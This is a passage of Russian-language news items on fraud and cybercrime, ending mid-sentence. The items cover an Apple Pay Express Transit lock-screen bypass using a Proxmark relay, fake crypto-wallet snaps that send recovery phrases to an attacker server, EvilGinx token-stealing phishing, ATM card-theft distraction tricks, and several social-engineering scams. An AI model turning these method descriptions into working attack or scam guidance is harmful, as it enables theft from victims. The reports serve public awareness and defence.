Express Transit работает с турникетами и считывателями карт, которые отправляют нестандартную последовательность байтов, минуя экран блокировки Apple Pay. В сочетании с картой Visa эту функцию можно использовать для обхода экрана блокировки Apple Pay и совершения незаконной оплаты с заблокированного iPhone на устройство чтения EMV на любую сумму и без авторизации пользователя.
Исследователи смогли имитировать транзакцию, используя устройство Proxmark. Метод представляет собой активную MitM-атаку воспроизведения и ретрансляции, в ходе которой Proxmark воспроизводит «специальные байты» на iPhone, якобы совершая оплату билета без необходимости аутентификации пользователя.
Эксперты также смогли изменить показатели Card Transaction Qualifiers (CTQ), отвечающие за установку лимитов бесконтактных транзакций. В ходе эксперимента исследователи осуществили транзакцию на сумму 1 тыс. фунтов стерлингов с заблокированного iPhone. Атака была успешно протестирована на iPhone 7 и iPhone 12.
Тесты прошли успешно только с iPhone и картами Visa. В случае Mastercard выполняется проверка того, что заблокированный iPhone принимает транзакции только от считывателей карт с кодом транзитного продавца.
Результаты исследования были отправлены в Apple и Visa в октябре 2020 года и мае 2021 года соответственно, но ни одна из компаний не устранила проблему. Вместо этого техногиганты переложили бремя исправления друг на друга, поэтому уязвимость все еще присутствует и может быть использована с помощью стандартного оборудования и программного обеспечения.
• Source: https://practical_emv.gitlab.io/
• Source: https://practical_emv.gitlab.io/assets/practical_emv_rp.pdf
• Video:
Полицейские сообщили о подозрении мукачевке, которая мошенническим путем завладела товаром косметической фирмы на сумму более 30 000 гривен. Следствие по делу продолжается
Противоправную деятельность женщины раскрыли сотрудники отдела противодействия киберпреступности в Закарпатской области совместно со следователями полиции Мукачево.
Правоохранители установили, что 34-летняя местная жительница, будучи представителем косметической фирмы через официальный интернет-ресурс общества зарегистрировала заведомо несуществующих людей. В дальнейшем, от их имени женщина заключила договора с компанией, получила заказанную продукцию, но не рассчиталась за нее.
Своими действиями мукачевка причинила обществу ущерб на сумму свыше 30 000 гривен.
Под процессуальным руководством Мукачевской окружной прокуратуры, следователи сообщили фигурантке о подозрении в совершении уголовных преступлений, предусмотренных ч. 3 ст. 190 (мошенничество, совершенное путем незаконных операций с использованием электронно-вычислительной техники) и ч. 1, 3 ст. 362 (несанкционированное изменение информации, которая обрабатывается в электронно-вычислительных машинах (компьютерах) совершено лицом, имеющим право доступа к ней) Уголовного кодекса Украины.
Досудебное расследование по делу продолжается.
В автономном сообществе арестовали преступную группировку, члены которой организовывали грабежи пожилых людей во время снятия ими наличных денежных средств из банкоматов. По предварительным оценкам, совокупный ущерб от противоправных действий злоумышленников составляет около 21 тысячи евро.
Отмечается, что региональная полиция задержала четырех человек в возрасте от 19 до 63 лет. В настоящее время открыто дело и против пятого участника банды за подозрение в кражах и мошенничестве с банковскими картами пожилых людей.
При снятии денег из банкоматов в различных городах провинции преступники применяли метод «посева». Так, пока пожилой человек снимал денежные средства, один из членов группы наблюдал за вводом PIN-кода, после чего отвлекал жертву и похищал карту.
Для отвлечения внимания они задействовали способ бросания купюры на землю и сообщением, что она якобы выпала из кармана жертвы. В тот момент, когда жертва наклонялась, преступник мгновенно крал карту. После этого один из членов группы шел к ближайшему банкомату, чтобы снять деньги или совершить покупки, пока другие злоумышленники отвлекали свидетелей инцидента.
В общей сложности за три месяца группировка совершила 12 краж в Барселоне, Аржентоне, Бадалоне, Л’Оспиталете-де-Льобрегат, Матаро, Реусе и Жироне. Суммарно им удалось завладеть примерно 21 тысячей евро.
Сообщается, что расследование началось еще в январе на фоне значительного роста количества таких преступлений. С помощью камер наблюдения в банкоматах полиция идентифицировала пятерых подозреваемых.
Региональные правоохранительные структуры продолжают расследование по данному делу и допускают новые аресты.
20minutos.es/noticia/5264353/0/desmantelan-un-grupo-que-abordaba-personas- mayores-cuando-sacaban-dinero-cajero-para-robarles/
Сотрудники ГУУР МВД России, отдела уголовного розыска УВД по ЦАО ГУ МВД России по г. Москве во взаимодействии с коллегами из других территориальных подразделений МВД России и ФСБ России задержали девять жителей разных регионов нашей страны. В зависимости от роли каждого они подозреваются в создании преступного сообщества, участии в его деятельности, мошенничестве и вымогательстве.
«Как сообщалось ранее, в отношении нескольких жителей столицы злоумышленники применили нестандартную схему мошенничества. С помощью психологических приемов они входили в доверие к потерпевшим, используя открытые сведения об их семьях. Убеждали взять несколько крупных кредитов и перечислить денежные средства на указанные ими счета. Затем, шантажируя опасностью, которая якобы угрожает им и их близким, заставляли выехать в другие регионы и не выходить на связь с родными.
В результате граждане несколько дней жили в арендованных квартирах, полагая, что тем самым спасают свои семьи. А аферисты тем временем вымогали у их родственников денежные средства, угрожая убить якобы похищенного ими человека. В настоящее время известно о семи эпизодах криминальной деятельности с общим ущербом на сумму более 50 млн рублей. По имеющейся информации, похищенные деньги направлялись в том числе на финансирование вооруженных сил Украины», - рассказала официальный представитель МВД России Ирина Волк.
В ходе оперативно-розыскных мероприятий полицейскими установлены личности 13 подозреваемых. Девять из них задержаны в Москве, Перми, Новосибирске и Казани полицейскими при содействии сотрудников Росгвардии. В ходе обысков у них изъяты средства связи, компьютерная техника, банковские и сим-карты, денежные средства, документы и другие предметы, имеющие доказательственное значение. Известно, что часть участников преступного сообщества находится за пределами Российской Федерации, в том числе на Украине. В отношении них решается вопрос об объявлении в международный розыск.
«Следователями СУ УВД по ЦАО ГУ МВД России по г. Москве возбуждены уголовные дела по признакам преступлений, предусмотренных статьями 159, 163 и 210 УК РФ. Задержанным фигурантам избраны различные меры пресечения», - сообщила Ирина Волк.
В ноябре 2023 года Александр искал, куда вложить свои накопления. На одном из сайтов увидел рекламный ролик с надписью: «Если ты видишь лошадь, которая бежит в другую сторону по отношению к другим лошадям, то тебе необходимо связаться с нами». Он отыскал нужную лошадь и оставил свой номер, надеясь на удачу.
Вскоре ему позвонила консультант по финансам Елена. Она расспросила Александра, куда он хотел бы вложить деньги и с какой целью. Выслушав, предложила вкладывать в электронную биржу, покупку криптовалюты, а после — выводить средства и переводить в рубли. Мужчина согласился — ему открыли счет и уговорили начать переводы деньги на карты якобы других клиентов.
Александра схема не смутила, он начал переводить на разные счета сотни тысяч. Когда на его счету было 93 тысячи долларов, Ульяна радостно сообщила, что деньги можно выводить. Через пару дней Александру позвонила другая женщина и сказала, что для вывода 25 тысяч долларов нужно внести залог размером 2,5 миллиона. Снова на карты разных людей. Он опять перевёл деньги. Через некоторое время потребовался ещё один взнос. Тогда он понял, что с направлением движения лошади он не угадал.
В каталоге приложений Snap Store, сопровождаемом компанией Canonical и продвигаемом для использования в Ubuntu, выявлено 10 приложений, стилизованных под официальные клиенты для популярных криптовалютных кошельков, но на деле не имеющие отношения к разработчикам данных проектов и выполняющие вредоносные действия. Более того, в каталоге данные приложения снабжены меткой "Safe", которая создаёт иллюзию того, что приложение проверено и является безопасным.
Приложения опубликованы пользователем digisafe00000 под именами, подобными
"exodus-build-96567", но в списке приложений выглядят как обычные
криптовалютные приложения Exodus, Tronlink, Polygon, Electrum, Uniswap,
Ladger, Metamask, JaxxLiberty, Avalanche и Trustwallet.
В настоящее время указанные приложения уже удалены из каталога Snap Store, но
почти сразу после их удаления они были размещены заново под новым
пользователем
codeguard0x0000 c немного
изменёнными именами пакетов (например, "exodus-build-71776" и "metamask-
stable28798").
Похожая активность [наблюдалась](https://popey.com/blog/2024/02/exodus-
bitcoin-wallet-490k-swindle/) в феврале и привела к краже около 9 биткойнов
(примерно 500 тысяч долларов) у пользователя, установившего поддельный клиент
Exodus. Так как авторы вредоносных приложений легко обходят автоматическую
систему проверки публикуемых пакетов в форуме компании Canonical некоторые
участники [предлагают](https://forum.snapcraft.io/t/should-unverified-
cryptocurrency-apps-be-banned/38919/8) вообще запретить в Snap Store
публикацию неверифицированных приложений, связанных с криптовалютой, по
аналогии с тем, как в 2022 году в платформе совместной разработки SourceHut
была запрещена
публикация криптовалютных проектов.
Приложения представляют собой муляжи, выводящие web-страницы с внешнего сайта
(например, http://89.116.xxx.145:5000/public/exodus/index.html
) при помощи
обёртки на базе WebKit GTK, симулирующей работу обычного настольного
приложения (в февральском инциденте использовались фиктивные приложения,
написанные на Flutter). Из функций работает только операция импортирования
ключей и восстановления кошелька, а попытки создания нового кошелька
завершаются выводом ошибки.
В случае если пользователь выполнит операцию импорта уже существующего кошелька, то связанные с ним фраза восстановления ключей отправляется на сервер злоумышленников, а пользователю показывается сообщение об ошибке восстановления кошелька. Получив доступ к ключам атакующие затем выводят все средства с кошелька жертвы.
Операция по борьбе с фишингом привела к арестам.
Европол сообщил о деятельности крупной группы мошенников, осуществляющих голосовой фишинг, которая обманула жертв в Европе на десятки миллионов евро. Колл-центры преступников находились в Украине.
Основной удар группировка нанесла по жителям Чехии, ущерб в этой стране оценивается более чем в 8 миллионов евро. Европол в сотрудничестве с властями Чехии и Украины, а также с Евроюстом, агентством сотрудничества в области уголовного правосудия ЕС, провели операцию по ликвидации преступной сети.
В результате операции в апреле этого года были арестованы шесть подозреваемых в Украине и четыре в Чехии. Проведены обыски в различных местах в обеих странах, включая дома подозреваемых, транспортные средства и колл-центры.
Были изъяты мобильные телефоны, SIM-карты и компьютерное оборудование. Мошенники использовали поддельные телефонные номера и выдавали себя за сотрудников банков и полиции, чтобы завоевать доверие жертв. Потерпевшим предлагалось перевести средства из своих «скомпрометированных» банковских счетов на «безопасные» счета преступников.
Расследование деятельности этой группы было начато в Евроюсте по запросу чешских властей два года назад в ноябре. В июне прошлого года была создана совместная следственная группа между чешской и украинской сторонами.
Ранее на этой неделе Европол сообщил о ликвидации четырех колл-центров в Болгарии, Кипре и Сербии, которые обманули в основном немецких жертв более чем на 2 миллиона евро.
Пресненский суд Москвы назначил по 4,5 года лишения свободы в колонии общего режима трем бывшим руководителям ООО "РАМ банк", признав их виновными в растрате более 1,6 млрд рублей. Об этом ТАСС сообщили в пресс-службе столичной прокуратуры.
"Приговором Пресненского районного суда Москвы подсудимые Наталья Асанович, Жасулан Тулепбеков и Денис Ширяев признаны виновными в совершении преступления, предусмотренного ч. 4 ст. 160 УК РФ (присвоение или растрата). Им назначено по 4,5 года колонии соответственно", - сказал собеседник агентства. Суд также назначил им штраф в размере 500 тыс. рублей каждому. По ее словам, данное решение не вступило в законную силу и может быть обжаловано в апелляционной инстанции в установленные законом сроки.
В ходе прений сторон прокуратура просила назначить Асанович и Ширяеву по 9 лет колонии общего режима, Тулепбекову - 9,5 года. Кроме того, гособвинение в качестве дополнительного наказания попросило суд назначить всем троим по 1 млн рублей штрафа.
По версии следствия, с февраля 2016 по июль 2019 года Асанович, являясь членом совета директоров, председателем правления и председателем кредитного комитета ООО "РАМ банк", в составе организованной группы с председателем совета директоров банка и его соучредителем Ширяевым, основным бенефициаром кредитного учреждения Тулепбековым, а также неустановленными лицами заключила соглашения о заведомо невозвратных кредитах с подконтрольными соучастникам организациями. Как установлено следствием и судом, фигуранты уголовного дела растратили более 1,6 млрд рублей, принадлежащих банку, перечислив их на расчетные счета этих компаний и распорядившись ими по своему усмотрению. Своими действиями финансисты привели кредитное учреждение к банкротству, настаивало гособвинение.
Уголовное дело расследовал следственный департамент МВД РФ. Судебный процесс проходил с конца лета прошлого года. В отношении неустановленных участников организованной группы материалы уголовного дела выделены в отдельное производство.
Специалисты Microsoft Threat Intelligence Center (MSTIC) [заявляют](https://www.microsoft.com/security/blog/2022/08/15/disrupting- seaborgiums-ongoing-phishing-operations/), что сорвали операцию, русскоязычной хак-группы SEABORGIUM, нацеленную на людей и организации в странах НАТО.
Группировка, которую Microsoft называет SEABORGIUM, известна исследователям как минимум с 2017 года. Другие компании отслеживают SEABORGIUM под названиями [COLDRIVER](https://blog.google/threat-analysis-group/continued-cyber- activity-in-eastern-europe-observed-by-tag/) (Google), Callisto Group (F-Secure) и TA446 (Proofpoint). Считается, что эта группа проводит кибершпионские атаки против военнослужащих, государственных чиновников, аналитических центров и журналистов в странах НАТО, регионах Балтии, Скандинавии и Восточной Европы.
«В целевых странах SEABORGIUM в первую очередь фокусирует свои операции на оборонных, разведывательных и консалтинговых компаниях, неправительственных и международных организациях, аналитических центрах и вузах, — пишут аналитики Microsoft. — SEABORGIUM замечена в атаках на бывших сотрудников разведки, экспертов по России и российских граждан за рубежом».
Click to expand...
Аналитики MSTIC пишут, что участники SEABORGIUM создают фейковые онлайн-
личности с помощью электронной почты, социальных сетей и учетных записей
LinkedIn. Затем эти фальшивки используются против целевых лиц и организаций с
помощью социальной инженерии.

От лица таких фейковых личностей злоумышленники связываются с интересующими их
целями, чтобы завязать разговор и наладить контакт, а в итоге присылают жертве
фишинговое вложение в одном из писем. Microsoft сообщает, что хакеры
распространяли письма с вложенными PDF-файлами, ссылками на файлообменники или
аккаунты OneDrive, где так же размещались PDF-документы.
После открытия такого файла жертва увидит сообщение о том, что документ не
может быть просмотрен, так как нужно нажать специальную кнопку, чтобы
повторить попытку.

Разумеется, нажатие на кнопку лишь приводит жертву на целевую страницу, где
запущен фишинговый фреймворк (например, EvilGinx) для отображения формы входа.
Так как EvilGinx действует как прокси, хакеры получают возможность перехватить
и похитить введенные учетные данные, а также файлы cookie/токены
аутентификации, сгенерированные после входа в учетную запись.
Затем эти украденные токены позволяют злоумышленникам войти в скомпрометированный аккаунт пользователя, даже если у жертвы включена двухфакторная аутентификация.
По информации Microsoft, как только хакеры получают доступ к целевой учетной записи, они либо похищают электронные письма и вложения, либо настраивают правила пересылки, чтобы получать все новые письма, поступающие на взломанную почту жертвы. Также исследователи наблюдали, как злоумышленники использовали взломанную учетную запись для ведения переговоров от лица жертвы (ради получения конфиденциальной информации).
Теперь специалисты MSTIC заявляют, что они предприняли ряд шагов для срыва вредоносной кампании SEABORGIUM, а именно отключили учетные записи, используемые хакерами для слежки, фишинга и сбора электронной почты.
Также компания поделилась индикаторами компрометации, включая 69 доменов, которые связаны с фишинговыми кампаниями группировки и используются для кражи учетных данных от аккаунтов Microsoft, ProtonMail и «Яндекс».
Хакер использовал уязвимость смарт-контракта децентрализованного финансового сервиса Fantom Fantasm Finance и вывел 1 007 эфиров.
Команда DeFi-проекта Fantasm Finance в среду, 9 марта, [сообщила](https://twitter.com/fantasm_finance/status/1501569232881995785?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1501569232881995785%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.coindesk.com%2Ftech%2F2022%2F03%2F10%2Ffantom- based-algo-protocol-fantasm-exploited-for-26m%2F) в Twitter о хакерской атаке и попросила всех пoльзoвaтeлeй забрать заблокированные токены XFTM, a также перевести токены из пула ликвидности во избежание потерь:
«Наш залоговый резерв FTM был взломан, в настоящее время осталось 1 820 012 баланса пула FTM для погашения».
Инженер компании Alpha Finance Нипун Питиманаари (Nipun Pitimanaaree) изучил следы взлома и заявил, что атаковавшие платформу злоумышленники использовали эксплойт в смарт-контракте Fantasm Mint и смогли выпустить огромное количество токенов Fantasm XFTM (XFTM), используя токены Fantasm FSM.
Питиманаари добавил, что вначале преступники использовали 50 токенов FTM, которые являются обеспечением проекта Fantasm. Затем, используя более крупные объемы токенов, обменяли токены на 1 007 эфиров (около $2.6 млн). После этого злоумышленники переместили эфиры на некий кошелек и отмыли украденные активы, используя миксер TornadoCash.
По данным экспертов по кибербезопасности, несколько пользователей последовали примеру неизвестных хакеров и воспользовались уязвимостью cмapт-кoнтpaктa Fantasm Mint. Они вывели из пула подавляющую массу оставшихся токенов. Toчный размер ущерба пока не называется, но он должен превысить первоначальную сумму в $2.6 млн.
Команда Fantasm в четверг, 10 марта, оповестила через Twitter пользователей площадки о разработке плана компенсации похищенных средств. Полная информация о взломе должна быть опубликована в ближайшее время. Вместе с тем, Питиманаари предупредил пользователей, что в смарт-контрактах проекта еще могут существовать уязвимости.
Гомельчанка перевела виртуальному англичанину более $12 тыс., сообщили БЕЛТА в УВД Гомельского облисполкома.
Жительница областного центра познакомилась в соцсети с новым другом, который общался с ней под ником Mr. Richard Wilson. Собеседник сразу обозначил: женщина ему очень понравилась. В переписке рассказал и свою историю, якобы он успешный хирург из Англии, вдовец слегка за 50 лет. Переписку вел на английском. Дама переводила сообщения при помощи онлайн-переводчика.
Виртуальный ухажер не скупился на комплименты. Он заверял, что готов переехать в Беларусь, чтобы встретиться, жить вместе и организовать совместный бизнес. 49-летняя горожанка также медицинский работник, поэтому проявила интерес.
Спустя время Ричард сообщил гомельчанке приятную новость: посылка с его личными вещами и дорогостоящим подарком для нее уже отправлена транспортной компанией. "Упомянул англичанин о том, что за доставку ценного груза он заплатил $180 тыс. Но ей беспокоиться не о чем и платить ни за что не нужно, надо просто ждать. Скоро и сам выедет. Однако 13 ноября женщине в мессенджере пришло сообщение, что на ее имя отправлена посылка, для получения которой необходимо оплатить определенную сумму. Первый транш обошелся гомельчанке в $3,8 тыс. 18 ноября приходит практически аналогичное сообщение: за пересылку посылки нужно доплатить в эквиваленте еще почти $8,5 тыс. Она перевела сумму в иностранной валюте на счет одного из российских банков. При этом гомельчанка продолжала общаться с мужчиной, рассказывала о странных требованиях оплаты. Он заверял, что как только она получит посылку, сможет взять оттуда потраченную сумму", - рассказали в УВД.
Через несколько дней женщина получила извещение с требованием доплатить за пересылку еще 18 470 евро. У гомельчанки возникли сомнения по поводу дороговизны пересылки. К тому же закончились накопления, которые довольно долго собирала. Тогда горожанка решила пойти в милицию. Однако перед этим из- за обиды и подозрения в обмане удалила всю переписку с англичанином в мессенджере.
Следователи возбудили уголовное дело по факту мошенничества в особо крупном размере. Однако, по данным правоохранителей, женщина все еще уверена, что Ричард не при чем - это вина транспортной компании.
Создатель криптовалюты AriseCoin и платформы AriseBank Джаред Райс, обманувший инвесторов на сумму более $4 млн, приговорён к пяти годам тюремного заключения.
Как указано на сайте Министерства юстиции США, об этом сообщил исполняющий обязанности прокурора США в Северном округе Техаса Прерак Шах (Prerak Shah). В конце 2018 года генеральный директор криптовалютной платформы AriseBank Джаред Райс (Jared Rice) попал под арест, а в марте 2019 года признал вину в совершении мошенничества с ценными бумагами и обмане инвесторов.
Платформа AriseBank позиционировалась как «первая в мире децентрализованная банковская платформа», на которой можно было открывать банковские счета, застрахованные Федеральной корпорацией по страхованию вкладов (FDIC), а также пользоваться кредитными картами Visa и криптовалютными услугами на основе AriseCoin.
Позднее выяснилось, что AriseBank не имел права вести банковскую деятельность в Техасе, счета клиентов не были застрахованы FDIC, а проект не заключал партнёрство с Visa. Помимо рекламирования несуществующих преимуществ AriseBank, Райс тратил деньги инвесторов на личные нужды: номера в отелях, обеды в ресторанах, путешествия и услуги семейного адвоката. Райс скрыл эту информацию от пользователей, как и тот факт, что ранее он был организатором другой мошеннической схемы в Интернете.
Между тем, несколько сотен инвесторов купили AriseCoin на общую сумму около $4.25 млн за BTC, ETH, LTC и фиатные валюты. На этой неделе окружной судья Эд Кинкид (Ed Kinkeade) приговорил Райса к пяти годам лишения свободы и постановил, чтобы он вернул инвесторам все полученные деньги ($4 258 073).
• Source: justice[.]gov/usao-ndtx/pr/cryptocurrency-ceo-sentenced-five- years-4-million-crypto-scheme
В Новой Зеландии девушка, которая пыталась отправить 30 000 новозеландских долларов ($20 тыс.) несуществующему парню в Соединенных Штатах, отказалась поверить сотрудникам банка, которые сказали ей, что ее обманули. К счастью, служба безопасности финансового учреждения наложила ограничения на суммы переводов с банковского аккаунта и не позволила клиентке стать жертвой мошенников. Об этом 30 августа сообщил телеканал Nine News.
Девушка пыталась осуществить перевод через Bank of New Zealand в начале этого года. Сотрудники поинтересовались, для чего ей нужны деньги, и в конце концов она рассказала, что это было сделано для того, чтобы ее парень, с которым она познакомилась в интернете, мог приехать в Новую Зеландию.
«К сожалению, клиентка стала жертвой аферы, связанной с любовными отношениями. Она познакомилась по интернету с человеком, который, как она считала, был главным хирургом в больнице», — заявила в интервью телеканалу глава отдела BNZ по борьбе с финансовыми преступлениями Эшли Кай Фонг.
Отмечается, что у этой истории любви также есть ковидный контекст — из-за чувства одиночества во время самоизоляции из-за пандемии девушка, как и многие другие пользователи сети, почувствовала себя одинокой и попыталась найти свое счастье в интернете, где встретила не свою любовь, а мошенников.
Bleeping Computer сообщает, что компания Microsoft без предупреждения исключила неподдерживаемые устройства из preview-программы Windows 11.
Хотя у Windows 11 очень жесткие системные требования (включая поддержку только новых процессоров, наличие модуля TPM 2.0, поддержку UEFI и функцию безопасной загрузки системы Secure Boot), Microsoft позволила участникам программы Windows Insiders на канале Dev отступить от этих требований, так что владельцы неподдерживаемых систем все равно могли устанавливать и тестировать Windows 11. Ранее в компании уверяли, что такая ситуация сохранится до самого релиза новой ОС, который, как стало известно на этой неделе, запланирован на 5 октября текущего года.
Но, как сообщают журналисты, теперь Microsoft исключила неподдерживаемые устройства из канала Dev и Insider-программы Windows 11, хотя до релиза ОС осталось еще больше месяца.
[](https://xakep.ru/wp- content/uploads/2021/09/357945/kicked-out-of-windows-11-insider-program.jpg)
После отображения уведомления, как на скриншоте выше, ОС предлагает перезагрузить устройство, а после перезапуска сообщает, что пользователи должны установить Windows 10, чтобы снова получать новые сборки.
[](https://xakep.ru/wp- content/uploads/2021/09/357945/after-restarting.jpg)
Если нажать на ссылку «Learn more», можно увидеть стандартную статью, которая гласит:
«Ваш компьютер не соответствует минимальным требованиям к оборудованию для Windows 11. Ваше устройство не соответствует требованиям для участия в программе Windows Insider Program для Windows 11. Установите Windows 10, чтобы участвовать в программе Windows Insider Program в Release Preview Channel».
Click to expand...
При этом журналисты заметили, что неподдерживаемые устройства все еще могут загружать последние накопительные обновления для Windows 11. Брэндон Леблан, старший менеджер Windows Inside, пояснил изданию, что неподдерживаемые устройства действительно продолжат получать только накопительные обновления, однако больше не смогут получать новые сборки Windows 11.
Разработчики Cisco сообщили, что в составе Enterprise NFV Infrastructure Software (NFVIS) устранена критическая уязвимость обхода аутентификации. Хуже того, для проблемы уже доступен публичный PoC-эксплоит.
Enterprise NFVIS представляет собой часть инфраструктурного ПО, которое помогает организациям развертывать виртуализированные сетевые функции, включая виртуальные маршрутизаторы и брандмауэры, на поддерживаемых устройствах Cisco, обеспечивая при этом централизованное управление и поддержку автоматизированного предоставления ресурсов.
Уязвимость обнаружили специалисты Orange Group, и ей был присвоен идентификатор [CVE-2021-34746](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-nfvis-g2DMVVh) (9,8 балла по шкале CVSS). Проблема была найдена в работе TACACS+ AAA (authentication, authorization, accounting) и связана с тем, что вводимые пользователем данные не проходят полную валидацию при передаче скрипту аутентификации. В итоге удаленный злоумышленник, не прошедший аутентификацию, может осуществить инжект параметров в аутентификационный запрос и воспользоваться багом, чтобы обойти аутентификацию в целом и войти на уязвимое устройство в качестве администратора.
Уязвимость представляла опасность для 4.5.1 Enterprise NFVIS, но только в том случае, если включен метод внешней аутентификации TACACS.
[](https://xakep.ru/wp- content/uploads/2021/09/358032/patch.jpg)
В настоящее время ошибка исправлена в составе Enterprise NFVIS 4.6.1 и более поздних версий. Разработчики Cisco подчеркивают, что PoC-эксплоит для этой уязвимости уже доступен, но компании не известно о каких-либо атаках, направленных на уязвимые продукты.
Следователи Главного следственного управления Нацполиции и киберполицейские Харьковщины разоблачили еще четырех членов преступной организации, которые присваивали средства граждан под видом службы безопасности банков.
По данным киберполиции, владельцам карточек злоумышленники сообщали о якобы сомнительных операциях с их счетом, поэтому для «защиты» своих средств гражданам предлагали через мобильное приложение перечислить их со своей карты на якобы специально созданный под нее виртуальный счет. На самом же деле, деньги перечислялись на счета третьих лиц, которые были получены фигурантами совершения уголовного правонарушения мошенническим путем или за вознаграждение.
В ноябре 2023 года силовики провели обыски в исправительных учреждениях на территории нескольких регионов государства, а также по месту жительства сообщников преступной организации.
Тогда при процессуальном руководстве Офиса Генерального прокурора 10 злоумышленникам, среди которых двое так называемых «авторитетов преступной среды» и один «смотрящий», следователи объявили о подозрении.
В июне 2024 года правоохранители разоблачили еще четырех сообщников фигурантов. Сейчас членов преступной группировки, которые находились на свободе, задержали в порядке ст. 208 Уголовно-процессуального кодекса Украины. К ним применены меры пресечения в виде содержания под стражей.
Следственные действия проводятся в рамках уголовного производства, начатого по ч. 4 ст. 190 (Мошенничество), ч. 2 ст. 255-1 (Установление или распространение преступного воздействия в учреждениях исполнения наказаний), ч. 2 ст. 255 (Участие в преступной организации) Уголовного Кодекса Украины. За содеянное злоумышленникам может грозить до 15-ти лет лишения свободы с конфискацией имущества.
Продолжается досудебное расследование.
npu.gov.ua/news/politseiski-vykryly-spilnykiv-viazniv-vypravnoi-kolonii-iaki- orhanizuvaly-shakhraiskyi-kol-tsentr
В Архангельской области суд рассмотрит дело 35-летней бывшей сотрудницы банка, похитившей у клиентов три миллиона рублей. Об этом «Ленте.ру» сообщили в МВД России.
По данным ведомства, женщина работала менеджером и финансовым экспертом в банке в Котласе. С апреля 2022 года по август 2023 года она обманывала клиентов, которые хотели открыть сберегательный счет или погасить займы. Фигурантка забирала деньги граждан, но не проводила операцию через кассу, а перечисляла суммы на свою карту. Также она похитила кредитую карту, которую клиентка оставила на хранение в банке, и расплачивалась ей в магазине, обналичивала деньги.
Всего известно о 13 потерпевших. Возбуждено дело по части 2 и 3 статьи 159 («Мошенничество») и части 3 статьи 158 («Кража») УК РФ.
Сотрудниками отдела уголовного розыска МУ МВД России «Благовещенское» задержан 18-летний амурчанин, подозреваемый в мошенничестве. Установлено, что молодой человек работал на кибер-преступников – забрал деньги у пенсионерки и перевел на банковские счета злоумышленников.
В полицию обратилась женщина, 1953 года рождения. Горожанка сообщила, что ее обманули мошенники. Ей позвонила якобы внучка и сообщила, что по ее вине произошло ДТП. Для урегулирования всех вопросов необходимы деньги. Обескураженная амурчанка поверила в данную историю и согласилась помочь. К ней за деньгами и приехал подозреваемый.
Пенсионерка передала ему завернутые в пакет 440 тысяч рублей. Двадцать из них молодой человек оставил себе в качестве вознаграждения, остальное перевел на указанные «работодателем» банковские счета. Для того чтобы установить личность подозреваемого сотрудниками уголовного розыска был проделан значительный объем работы. Затруднения возникли и в том, что растерянная потерпевшая не смогла назвать точных данных, способствующих оперативному раскрытию преступления.
Сам злоумышленник, осознавая, что его деятельность противоправна и подлежит уголовной ответственности, старался тщательно все скрыть. В ходе оперативно- розыскных мероприятий сотрудники уголовного розыска установили личность и местожительство молодого человека, выступившего в роли «курьера».
Подозреваемый был задержан при силовой поддержке СОБР регионального Управления Росгвардии на автовокзале областного центра. Установлено, что на тот момент он получил новое задание от кибер-мошенников и приобрел автобусный билет в г. Свободный, но уехать не успел.
В содеянном задержанный признался и раскаялся. Следователем МУ МВД России «Благовещенское» возбуждено уголовное дело по ч. 3 ст. 159 УК РФ «Мошенничество». Данное преступное деяние влечет за собой наказание в виде лишения свободы на срок до шести лет. Судом по ходатайству следователя в отношении фигуранта избрана мера пресечения в виде заключения под стражу.
Россияне пожаловались, что у них не работают подключения по VPN — вероятно, их
блокируют.
Сообщается, что не работают подключения на базе OpenVPN и WireGuard. Это происходит у пользователей Ростелекома, МТС, Билайна, Теле2, Yota.
Причём такие блокировки уже были (https://t.me/lentadnya/81427) — в конце мая
Королевская канадская конная полиция канадского города Келоуна (провинция Британская Колумбия) конфисковала напольное покрытие на 100 тысяч канадских долларов (6,88 миллиона рублей), купленное по поддельному удостоверению личности и украденной кредитной карте. Как уточняет портал Kelowna Now, продолжительная серия мошеннических покупок была остановлена благодаря бдительности хозяина местного магазина.
Покупка совершалась в онлайне, и покрытия на 30 тысяч канадских долларов (около двух миллионов рублей) должны были отправить в неназванный порталом город на другом конце Канады. Для подтверждения сделки покупатель должен был предоставить копию своего удостоверения личности. Хозяин магазина заподозрил, что здесь что-то нечисто и передал данные полиции, которая подтвердила, что это мошенничество.
Затем продавец направил запросы некоторым своим коллегам по отрасли и выяснил, что человек с такими же именем и фамилией делал заказы еще в двух компаниях. В одном из этих случаев удалось перехватить уже почти отправленный заказчику груз. В другом — грузовик с напольными покрытиями остановили в середине страны. Тем не менее, выявить личность мошенника пока не удалось.
source: kelownanow.com/watercooler/news/news/Kelowna/Kelowna_RCMP_seizes_100K_worth_of_flooring_bought_with_fake_ID_and_stolen_credit_card
МВД Азербайджана получило информацию о кибератаке, совершенной в отношении одной из ведущих компаний продовольственного сектора. Преступники, используя сложные алгоритмы и методы социальной инженерии, получили несанкционированный доступ к серверам, где хранилась ценная коммерческая информация.
Благодаря использованию специального программного обеспечения сотрудники полиции смогли установить личности и местонахождение преступников. Ими оказались Мурад Рзаев, Ибрагим Алескеров и Эльвин Алимамедов. Они не только получили доступ к конфиденциальным сведениям, составляющим коммерческую тайну компании, но и попытались продать их за 60 000 манатов (3 191 400 рублей).
Покупатели должны были вносить 10 000 манатов (531 900 рублей) ежемесячно за продолжение сбыта данных. Однако ни одной сделки совершить не удалось: хакеров поймали. Специалисты полиции исследовали зашифрованную информацию, изучили детали кибератаки и установили точные координаты преступников.
В связи с незаконным завладением компьютерными данными против задержанных мужчин возбуждено уголовное дело по статьям 271.2.2 (несанкционированный доступ к компьютерной системе группой лиц по предварительному сговору) и 272.2.2 (незаконное завладение компьютерными данными группой лиц) УК Азербайджанской Республики. Следствие продолжается, а обвиняемые на данный момент находятся под арестом.
В Саратове полицейские задержали еще одного курьера, работавшего на ДТП-
мошенников. Об этом рассказывает видеосюжет регионального ГУ МВД.
19-летний парень успел наведаться к нескольким потерпевшим. Четвертый по счету
визит стал для него последним – на лестничной клетке его задержали
оперативники уголовного розыска.
Днем на домашний телефон жительницы Саратова позвонили мошенники, но сначала женщина услышала в трубке детский плач и просьбы о помощи. После чего на другом конце провода раздался голос "следователя". Незнакомка сообщила, что внучка женщины пострадала в ДТП при переходе дороги в неположенном месте. Девочка попала под машину, водитель тоже серьезно пострадал. На лечение и помощь водителю требовалась крупная сумма денег. У потерпевшей в наличии было около 300 тысяч.
В момент переговоров в квартиру зашел сын пенсионерки, действующий сотрудник
управления экономической безопасности и противодействия коррупции, который
